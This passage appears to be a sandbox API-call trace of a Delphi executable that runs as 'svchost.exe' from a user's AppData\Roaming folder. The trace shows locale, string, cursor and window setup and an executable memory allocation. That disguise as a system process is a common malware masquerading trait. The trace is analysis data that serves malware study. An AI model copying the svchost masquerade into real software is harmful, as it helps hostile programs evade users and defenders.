lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0147.549] GetThreadLocale () returned 0x409 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0147.549] GetThreadLocale () returned 0x409 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0147.549] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0147.549] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0147.549] GetProcAddress (hModule=0x76720000, lpProcName="VariantChangeTypeEx") returned 0x76724c28 [0147.549] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0147.549] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0147.549] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarI4FromStr") returned 0x76736fab [0147.550] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromStr") returned 0x767401a0 [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarR8FromStr") returned 0x7673699e [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromStr") returned 0x76746ba7 [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarCyFromStr") returned 0x76766c12 [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarBoolFromStr") returned 0x7673dbd1 [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromCy") returned 0x76747fdc [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromDate") returned 0x76737a2a [0147.551] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromBool") returned 0x76740355 [0147.552] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0147.552] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0147.552] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0147.553] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77820000 [0147.553] GetDC (hWnd=0x0) returned 0x40109d3 [0147.553] GetDeviceCaps (hdc=0x40109d3, index=90) returned 96 [0147.553] ReleaseDC (hWnd=0x0, hDC=0x40109d3) returned 1 [0147.553] GetDC (hWnd=0x0) returned 0x40109d3 [0147.553] GetDeviceCaps (hdc=0x40109d3, index=104) returned 0 [0147.553] ReleaseDC (hWnd=0x0, hDC=0x40109d3) returned 1 [0147.553] CreatePalette (plpal=0x18fb30) returned 0x40809b3 [0147.553] GetStockObject (i=7) returned 0x1b00017 [0147.553] GetStockObject (i=5) returned 0x1900015 [0147.553] GetStockObject (i=13) returned 0x18a002e [0147.553] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0147.553] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0147.554] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0147.555] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0147.556] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0147.556] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0147.556] GetCurrentThreadId () returned 0xbd0 [0147.557] GlobalAddAtomA (lpString="WndProcPtr0040000000000BD0") returned 0xc128 [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0147.557] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0147.558] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0147.559] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0147.559] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1e8 [0147.559] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1e9 [0147.559] GetVersion () returned 0x1db10106 [0147.559] GetCurrentProcessId () returned 0xbcc [0147.559] GlobalAddAtomA (lpString="Delphi00000BCC") returned 0xc02e [0147.560] GetCurrentThreadId () returned 0xbd0 [0147.560] GlobalAddAtomA (lpString="ControlOfs0040000000000BD0") returned 0xc127 [0147.560] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000BD0") returned 0xc1ea [0147.560] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0147.560] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0147.560] GetSystemMetrics (nIndex=19) returned 1 [0147.563] GetSystemMetrics (nIndex=75) returned 1 [0147.563] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x211320, fWinIni=0x0 | out: pvParam=0x211320) returned 1 [0147.564] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0147.564] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0147.564] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x30285 [0147.565] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0147.565] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0147.565] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0147.565] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0xe00af [0147.565] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xc0113 [0147.565] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x12023b [0147.565] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x70065 [0147.566] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x40231 [0147.566] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x502b1 [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0147.566] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0147.567] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0147.567] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0147.567] GetDC (hWnd=0x0) returned 0x40109d3 [0147.567] GetDeviceCaps (hdc=0x40109d3, index=90) returned 96 [0147.567] ReleaseDC (hWnd=0x0, hDC=0x40109d3) returned 1 [0147.567] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0147.567] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4564bc, dwData=0x21156c) returned 1 [0147.567] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0147.567] CreateFontIndirectA (lplf=0x18fe97) returned 0xd0a09b2 [0147.568] GetObjectA (in: h=0xd0a09b2, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0147.568] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0147.568] CreateFontIndirectA (lplf=0x18fe1f) returned 0xb0a09b4 [0147.568] GetObjectA (in: h=0xb0a09b4, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0147.568] CreateFontIndirectA (lplf=0x18fde3) returned 0xb0a09b5 [0147.568] GetObjectA (in: h=0xb0a09b5, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0147.568] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x702cb [0147.585] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0147.585] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe") returned 1 [0147.585] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x320000 [0147.585] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0147.585] RegisterClassA (lpWndClass=0x45fe1c) returned 0xb6c1ec [0147.586] GetSystemMetrics (nIndex=0) returned 1440 [0147.586] GetSystemMetrics (nIndex=1) returned 900 [0147.586] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="svchost", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x202dc [0147.589] SetWindowLongA (hWnd=0x202dc, nIndex=-4, dwNewLong=3280879) returned 4219680 [0147.589] SendMessageA (hWnd=0x202dc, Msg=0x80, wParam=0x1, lParam=0x702cb) returned 0x0 [0147.589] NtdllDefWindowProc_A (hWnd=0x202dc, Msg=0x80, wParam=0x1, lParam=0x702cb) returned 0x0 [0147.589] SetClassLongA (hWnd=0x202dc, nIndex=-14, dwNewLong=459467) returned 0x0 [0147.590] GetSystemMenu (hWnd=0x202dc, bRevert=0) returned 0x2028d [0147.592] DeleteMenu (hMenu=0x2028d, uPosition=0xf030, uFlags=0x0) returned 1 [0147.592] DeleteMenu (hMenu=0x2028d, uPosition=0xf000, uFlags=0x0) returned 1 [0147.592] DeleteMenu (hMenu=0x2028d, uPosition=0xf010, uFlags=0x0) returned 1 [0147.593] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0147.595] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0147.596] GetProcAddress (hModule=0x77820000, lpProcName="AnimateWindow") returned 0x7784b531 [0147.596] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75460000 [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="InitializeFlatSB") returned 0x7549266f [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="UninitializeFlatSB") returned 0x75492542 [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollProp") returned 0x75491d29 [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollProp") returned 0x7549238d [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_EnableScrollBar") returned 0x754920c9 [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_ShowScrollBar") returned 0x75491fdb [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollRange") returned 0x75491e8d [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollInfo") returned 0x75491f0f [0147.597] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollPos") returned 0x75491ccd [0147.598] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollPos") returned 0x7549216d [0147.598] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollInfo") returned 0x754922be [0147.598] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollRange") returned 0x754921e2 [0147.598] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77820000 [0147.598] GetProcAddress (hModule=0x77820000, lpProcName="SetLayeredWindowAttributes") returned 0x7785ec88 [0147.598] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0147.598] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe2c, nSize=0xff | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] GetLastError () returned 0x6 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.598] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 